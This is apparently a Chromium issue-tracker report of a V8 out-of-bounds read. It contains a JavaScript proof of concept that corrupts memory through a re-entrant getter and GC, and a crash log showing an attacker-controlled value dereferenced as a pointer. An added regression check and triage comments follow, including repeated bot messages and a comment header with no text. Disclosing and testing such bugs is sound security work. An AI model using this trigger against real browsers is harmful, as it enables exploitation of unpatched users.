Security: V8 OOB Read in GC with Array Object
Reported by sjh...@gmail.com, Jun 18 2016
Issue description

VULNERABILITY DETAILS
I think the bug is in the "gc();" method. I tried to analyze this case in detail, but there is already a (fixed or WontFix) issue on crbug.com. :-( I just tried to control registers. I attached more detailed V8 crash logs in a zip file (changing the "RIP" register in V8 5.2.0).

VERSION
Chrome Version: 51.0.2704.84 m + stable 64bit
Operating System: Windows 10 Pro 64bit Korean

REPRODUCTION CASE

    // Flags: --expose-gc
    var o0 = [];
    var o1 = [];
    var count = 0;
    // Accessor on o1[0]: runs re-entrantly while V8 is reading o1, and
    // replaces o0's backing store with 0x1000 copies of 0x41414141 before
    // forcing a GC and a concat over both arrays.
    o1.__defineGetter__(0, function() {
      o0.shift();
      for (var i = 0; i < 0x1000; i++) o0.push(0x41414141);
      gc();
      o0.concat(o1);
    });
    gc();
    o1[0];   // triggers the getter

FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: V8 in renderer tab
Crash State:

=================================== 64 bit case ===================================
(19cc.1de8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for c:\Program Files (x86)\Google\Chrome\Application\51.0.2704.103\chrome_child.dll -
chrome_child!GetHandleVerifier+0xe9feaa:
00007ffb`2bec51fa 488b43ff        mov     rax,qword ptr [rbx-1] ds:41414141`00000000=????????????????

3:032> kbn
 # RetAddr           : Args to Child                                                            : Call Site
00 00007ffb`2bec51bc : 00000209`aa9f9810 00000057`f24f6ff0 00000000`00000000 00000057`f24f6c90 : chrome_child!GetHandleVerifier+0xe9feaa
01 00007ffb`2b2dc86c : ffffffff`ffffffff 00000209`aa97a8a0 000000e5`65651bd0 00000057`f24f6c98 : chrome_child!GetHandleVerifier+0xe9fe6c
02 00007ffb`2bec584d : 00000000`00000002 00000209`aa98dee0 00000057`00001000 00000057`00000004 : chrome_child!GetHandleVerifier+0x2b751c
03 00007ffb`2bec7783 : 00000209`aa98e930 00007ffb`2e890386 00000209`aa991310 00000000`00000002 : chrome_child!GetHandleVerifier+0xea04fd
04 00007ffb`2bea301f : 00000209`aa991310 00000000`00000001 00000209`aa9c1170 00000209`aa9c1170 : chrome_child!GetHandleVerifier+0xea2433
05 00007ffb`2bea28d6 : 00000209`ad0a0600 00000057`f24f7510 00000000`00000000 00000209`aa9c1170 : chrome_child!GetHandleVerifier+0xe7dccf
06 00007ffb`2bea1a85 : 00000209`aa9c1170 00000000`00000002 00000000`00000004 00007ffb`2e4125f8 : chrome_child!GetHandleVerifier+0xe7d586
07 00007ffb`2b2da27a : 00007ffb`2c2c59c0 00000057`f24f78f0 00000057`f24f78e8 00000057`f24f75d0 : chrome_child!GetHandleVerifier+0xe7c735
08 00007ffb`2bf1f32a : 00000209`aa9c1150 00007ffb`2c2c59c0 00000057`f24f75d0 00000209`aa9c1150 : chrome_child!GetHandleVerifier+0x2b4f2a
09 00007ffb`2be05abb : 00000000`00000000 00000209`aa9c1150 00000057`f24f7a50 00000000`00000000 : chrome_child!GetHandleVerifier+0xef9fda
0a 00007ffb`2bdff0c3 : 00000209`aa9c1208 00000000`00000000 0000021a`de804301 00000057`f24f7680 : chrome_child!GetHandleVerifier+0xde076b
0b 00007ffb`2bdff039 : 00000000`000000b8 00000057`f24f7989 00007ffb`2e890385 0000021a`de8af8e1 : chrome_child!GetHandleVerifier+0xdd9d73
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for ntdll.dll -
0c 000003b5`e88092ab : 0000021a`de8af8e1 000000e5`6562ecf1 00000000`000000b8 00000000`00000002 : chrome_child!GetHandleVerifier+0xdd9ce9
0d 0000021a`de8af8e1 : 000000e5`6562ecf1 00000000`000000b8 00000000`00000002 00000057`f24f7a58 : 0x000003b5`e88092ab
0e 000000e5`6562ecf1 : 00000000`000000b8 00000000`00000002 00000057`f24f7a58 00000000`00000001 : 0x0000021a`de8af8e1
0f 00000000`000000b8 : 00000000`00000002 00000057`f24f7a58 00000000`00000001 0000000b`00000000 : 0x000000e5`6562ecf1
10 00000000`00000002 : 00000057`f24f7a58 00000000`00000001 0000000b`00000000 000003b5`e88091e1 : 0xb8
11 00000057`f24f7a58 : 00000000`00000001 0000000b`00000000 000003b5`e88091e1 00000057`f24f79f0 : 0x2
12 00000000`00000001 : 0000000b`00000000 000003b5`e88091e1 00000057`f24f79f0 00000003`00000000 : 0x00000057`f24f7a58
13 0000000b`00000000 : 000003b5`e88091e1 00000057`f24f79f0 00000003`00000000 00000057`f24f7a78 : 0x1
14 000003b5`e88091e1 : 00000057`f24f79f0 00000003`00000000 00000057`f24f7a78 000003b5`e883e765 : 0x0000000b`00000000
15 00000057`f24f79f0 : 00000003`00000000 00000057`f24f7a78 000003b5`e883e765 000000e5`6562ecf1 : 0x000003b5`e88091e1
16 00000003`00000000 : 00000057`f24f7a78 000003b5`e883e765 000000e5`6562ecf1 000000e5`6564e179 : 0x00000057`f24f79f0
17 00000057`f24f7a78 : 000003b5`e883e765 000000e5`6562ecf1 000000e5`6564e179 000000e5`6562ecf1 : 0x00000003`00000000
18 000003b5`e883e765 : 000000e5`6562ecf1 000000e5`6564e179 000000e5`6562ecf1 000000e5`6567c201 : 0x00000057`f24f7a78
19 000000e5`6562ecf1 : 000000e5`6564e179 000000e5`6562ecf1 000000e5`6567c201 0000021a`de8af8e1 : 0x000003b5`e883e765
1a 000000e5`6564e179 : 000000e5`6562ecf1 000000e5`6567c201 0000021a`de8af8e1 00000057`f24f7aa8 : 0x000000e5`6562ecf1
1b 000000e5`6562ecf1 : 000000e5`6567c201 0000021a`de8af8e1 00000057`f24f7aa8 000003b5`e883ba24 : 0x000000e5`6564e179
1c 000000e5`6567c201 : 0000021a`de8af8e1 00000057`f24f7aa8 000003b5`e883ba24 000000e5`6567c1e1 : 0x000000e5`6562ecf1
1d 0000021a`de8af8e1 : 00000057`f24f7aa8 000003b5`e883ba24 000000e5`6567c1e1 000000e5`6567c201 : 0x000000e5`6567c201
1e 00000057`f24f7aa8 : 000003b5`e883ba24 000000e5`6567c1e1 000000e5`6567c201 000003b5`e883b941 : 0x0000021a`de8af8e1
1f 000003b5`e883ba24 : 000000e5`6567c1e1 000000e5`6567c201 000003b5`e883b941 0000000c`00000000 : 0x00000057`f24f7aa8
20 000000e5`6567c1e1 : 000000e5`6567c201 000003b5`e883b941 0000000c`00000000 00000057`f24f7bc0 : 0x000003b5`e883ba24
21 000000e5`6567c201 : 000003b5`e883b941 0000000c`00000000 00000057`f24f7bc0 000003b5`e88252a3 : 0x000000e5`6567c1e1
22 000003b5`e883b941 : 0000000c`00000000 00000057`f24f7bc0 000003b5`e88252a3 00000000`00000000 : 0x000000e5`6567c201
23 0000000c`00000000 : 00000057`f24f7bc0 000003b5`e88252a3 00000000`00000000 00000057`f24f8460 : 0x000003b5`e883b941
24 00000057`f24f7bc0 : 000003b5`e88252a3 00000000`00000000 00000057`f24f8460 00000000`00000000 : 0x0000000c`00000000
25 000003b5`e88252a3 : 00000000`00000000 00000057`f24f8460 00000000`00000000 00000057`f24f83e0 : 0x00000057`f24f7bc0
26 00000000`00000000 : 00000057`f24f8460 00000000`00000000 00000057`f24f83e0 3fe00000`00000000 : 0x000003b5`e88252a3

3:032> r
rax=0000000000000001 rbx=4141414100000001 rcx=00000057f24f6ff0
rdx=00000209aa9f9738 rsi=00000209aa9f9810 rdi=00000057f24f6ff0
rip=00007ffb2bec51fa rsp=00000057f24f6f10 rbp=00000057f24f6ff0
 r8=000003b5e8849fa1  r9=000003b5e88013e4 r10=0000000000300000
r11=0000000000000400 r12=0000000000000000 r13=0000000000000001
r14=0000021ade804301 r15=00000209aa98df18
iopl=0         nv up ei pl zr na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
chrome_child!GetHandleVerifier+0xe9feaa:
00007ffb`2bec51fa 488b43ff        mov     rax,qword ptr [rbx-1] ds:41414141`00000000=????????????????
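The faulting instruction in the log above, mov rax,[rbx-1], is a load through a V8 tagged heap pointer (HeapObject tag bit 1, map at offset 0), and rbx holds the 0x41414141 fill that the getter pushed into o0: a value the reporter controls was dereferenced as an object. The bug class is a builtin that keeps a backing-store pointer or length across a user callback that resizes the array. The following is an added example, not code from the bug report or from V8: a spec-level regression check for that class that exercises Array.prototype.concat with an accessor on the receiver's index 0 which shrinks (and optionally regrows) the array mid-copy, and verifies the result against what the specification prescribes (length read once up front, then HasProperty/Get per index). The parameter names, the "getter" marker value and the tail array are this example's own; gc() is only called when present, i.e. under --expose-gc.

```javascript
"use strict";

// Added example, not code from the bug report or from V8: a spec-level
// regression check for the bug class the repro above exercises, a user
// callback (an accessor on an array index) that mutates an array while
// Array.prototype.concat is still copying from it.
//
// Per the ES spec, concat reads each source's length once up front and then
// does HasProperty/Get per index, so the result is fully determined however
// the source is resized from inside the getter. An engine that caches the
// backing-store pointer or length across the callback reads stale memory
// instead. `length`, `fill` and `regrow` are this example's own parameters.

function makeReentrantSource(length, fill, regrow) {
  const src = new Array(length).fill(fill);
  let fired = 0;
  // Index 0 becomes an accessor; reading it shrinks src to one element and,
  // if requested, regrows it so the backing store is reallocated.
  Object.defineProperty(src, 0, {
    configurable: true,
    enumerable: true,
    get() {
      fired++;
      src.length = 1;
      if (regrow) {
        for (let i = 0; i < length; i++) src.push(fill);
      }
      if (typeof gc === "function") gc(); // only present under --expose-gc
      return "getter";
    },
  });
  return { src, calls: () => fired };
}

// Runs concat with the reentrant array as the receiver and checks the result
// against what the spec prescribes. Returns a plain object so the checks can
// be asserted on rather than only printed.
function concatUnderMutation(length, fill, regrow) {
  const { src, calls } = makeReentrantSource(length, fill, regrow);
  const tail = ["a", "b"];
  const out = src.concat(tail);

  // concat read src.length before the getter ran, so every original index of
  // src is accounted for and the tail lands at offsets length and length+1.
  const expectedLength = length + tail.length;
  let ok = out.length === expectedLength &&
           out[0] === "getter" &&
           out[length] === "a" &&
           out[length + 1] === "b";
  // Indices 1..length-1 were deleted by the getter; they carry the fill value
  // only if the getter regrew the array, and read as undefined otherwise.
  for (let k = 1; k < length; k++) {
    ok = ok && out[k] === (regrow ? fill : undefined);
  }
  return { ok, length: out.length, getterCalls: calls() };
}

// Stand-alone usage (node [--expose-gc] thisfile.js): both variants must hold.
console.log(concatUnderMutation(0x1000, 0x41414141, true));
console.log(concatUnderMutation(0x1000, 0x41414141, false));
```

The check is deliberately engine-agnostic: it compares against the specification, not against a particular V8 path, so it is equally usable as a fuzzing oracle for other array builtins (slice, splice, indexOf) that take user callbacks or accessors mid-operation. A crash or a wrong length is the signal; an explicit undefined versus a hole at the deleted indices is an accepted implementation difference and is not asserted on.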
Jun 20 2016
Hi, thanks for the report. Is this the same bug as issue 620553?
Jun 20 2016
Yep, right, same issue. :D
Sep 28 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Oct 1 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Oct 2 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Comment 1 by ClusterFuzz, Jun 19 2016